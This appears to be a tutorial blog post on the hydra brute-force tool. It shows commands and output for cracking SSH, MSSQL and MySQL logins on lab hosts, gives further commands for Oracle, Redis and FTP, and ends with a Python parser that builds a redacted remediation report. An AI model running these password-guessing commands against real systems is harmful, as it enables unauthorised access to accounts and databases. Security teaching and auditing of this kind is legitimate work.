The brute-force tool hydra

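This article is for learning purposes only. The author accepts no legal responsibility for any adverse consequences of using it for other purposes!

Official website
https://www.thc.org/
Usage and options
hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns]
[-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-S] [-vV] server service [OPT]
-R Resume from where the previous session left off.
-S Connect over SSL.
-s PORT Specify a non-default port.
-l LOGIN Specify a single login name, to test one particular user.
-L FILE Specify a username dictionary.
-p PASS Lowercase: specify a single password. Rarely used; a password dictionary is the usual choice.
-P FILE Uppercase: specify a password dictionary.
-e ns Optional. n: try an empty password; s: try the login name as the password.
-C FILE Use a colon-separated file, e.g. "login:password", instead of the -L/-P options.
-M FILE Specify a target list file, one target per line.
-o FILE Specify the file the results are written to.
-f When used with -M, stop as soon as the first login/password pair is found.
-t TASKS Number of tasks run in parallel, default 16.
-w TIME Maximum timeout in seconds, default 30s.
-v / -V Show verbose output.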

Preparing the dictionaries

┌──(root💀kali)-[~/桌面]
└─# ls
pass.txt  user.txt   # user.txt is the username dictionary, pass.txt is the password dictionary

SSH example

┌──(root💀kali)-[~/桌面]
└─# hydra -L user.txt -P pass.txt ssh://10.238.91.126 -v   
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-11-26 11:19:54
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[VERBOSE] More tasks defined than login/pass pairs exist. Tasks reduced to 7
[DATA] max 7 tasks per 1 server, overall 7 tasks, 7 login tries (l:1/p:7), ~1 try per task
[DATA] attacking ssh://10.238.91.126:22/
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[INFO] Testing if password authentication is supported by ssh://root@10.238.91.126:22
[INFO] Successful, password authentication is supported by ssh://10.238.91.126:22
[22][ssh] host: 10.238.91.126   login: root   password: 111111 
[STATUS] attack finished for 10.238.91.126 (waiting for children to complete tests)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-11-26 11:19:58

The password is shown in the line that begins with the port number:
[22][ssh] host: 10.238.91.126 login: root password: 111111

MSSQL example

┌──(root💀kali)-[~/桌面]
└─# hydra -L user.txt -P pass.txt mssql://10.238.91.132 -v -t 10
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-11-26 11:25:26
[DATA] max 10 tasks per 1 server, overall 10 tasks, 42 login tries (l:6/p:7), ~5 tries per task
[DATA] attacking mssql://10.238.91.132:1433/
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[1433][mssql] host: 10.238.91.132   login: sa   password: 123456
[STATUS] attack finished for 10.238.91.132 (waiting for children to complete tests)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-11-26 11:25:30

[1433][mssql] host: 10.238.91.132 login: sa password: 123456

MySQL example

┌──(root💀kali)-[~/桌面]
└─# hydra -L user.txt -P pass.txt mysql://10.238.91.132 -v -t 10
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-11-26 11:26:36
[INFO] Reduced number of tasks to 4 (mysql does not like many parallel connections)
[DATA] max 4 tasks per 1 server, overall 4 tasks, 42 login tries (l:6/p:7), ~11 tries per task
[DATA] attacking mysql://10.238.91.132:3306/
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[3306][mysql] host: 10.238.91.132   login: root   password: I8k!R3p(#e
[STATUS] attack finished for 10.238.91.132 (waiting for children to complete tests)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-11-26 11:26:40

[3306][mysql] host: 10.238.91.132 login: root password: I8k!R3p(#e

I have no local environment for the following services, so there are no concrete examples. The commands are as follows:

oracle

hydra -P pass.txt oracle://192.168.0.129 -f -v

redis

hydra -P pass.txt -e nsr -t 16 192.168.0.101 redis

ftp

hydra -L user.txt -P pass.txt ftp://192.168.1.0 -f -V

Testing multiple IPs

Add -M followed by an IP list file. MySQL is used as the example.

hydra -L user.txt -P pass.txt -M ip.txt -V -o /root/crack mysql -t 16
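
An added example (not part of the original post or of the hydra project): a Python parser that turns result lines in the format shown above into a per-host remediation list with the passwords removed, so the findings of an audit can be handed to the system owners. It assumes the file written by -o contains the same result lines; the category names and the two 192.0.2.10 entries are constructed for illustration.

```python
import re
from collections import defaultdict

# Result-line shape shown on this page: "[22][ssh] host: H   login: U   password: P".
# Assumption: services without usernames print no "login:" field, so it is optional.
RESULT = re.compile(
    r"^\[(?P<port>\d+)\]\[(?P<service>[^\]]+)\]\s+host:\s+(?P<host>\S+)"
    r"(?:\s+login:\s+(?P<login>.*?))?\s+password:\s*(?P<password>.*)$"
)

# Three result lines copied from the page's output, plus constructed noise and
# two constructed findings on a documentation address (192.0.2.10).
SAMPLE = """\
[DATA] attacking ssh://10.238.91.126:22/
[22][ssh] host: 10.238.91.126   login: root   password: 111111
[STATUS] attack finished for 10.238.91.126 (waiting for children to complete tests)
[1433][mssql] host: 10.238.91.132   login: sa   password: 123456
[3306][mysql] host: 10.238.91.132   login: root   password: I8k!R3p(#e
[21][ftp] host: 192.0.2.10   login: ftp   password: ftp
[6379][redis] host: 192.0.2.10   password:
"""

def parse_findings(text):
    """Return one dict per result line; banner, [DATA] and [STATUS] lines are skipped."""
    findings = []
    for line in text.splitlines():
        m = RESULT.match(line.strip())
        if m:
            findings.append({**m.groupdict(), "port": int(m["port"])})
    return findings

def classify(login, password):
    """Name the weakness behind a finding (hypothetical categories for triage)."""
    if password == "":
        return "empty password"            # what -e n probes
    if login is not None and password == login:
        return "password equals login"     # what -e s probes
    if password.isdigit():
        return "digits only"
    return "listed in the dictionary"      # complex-looking, but still guessable

def remediation_report(text):
    """Group findings by host, dropping the password so the report can be shared."""
    report = defaultdict(list)
    for f in parse_findings(text):
        report[f["host"]].append((f["service"], f["port"], f["login"],
                                  classify(f["login"], f["password"])))
    return dict(report)

if __name__ == "__main__":
    for host, items in remediation_report(SAMPLE).items():
        print(host, items)
```

The MySQL finding shows that a password with mixed character classes is still reported once it appears in a dictionary, so remediation means rotating it, not only lengthening it.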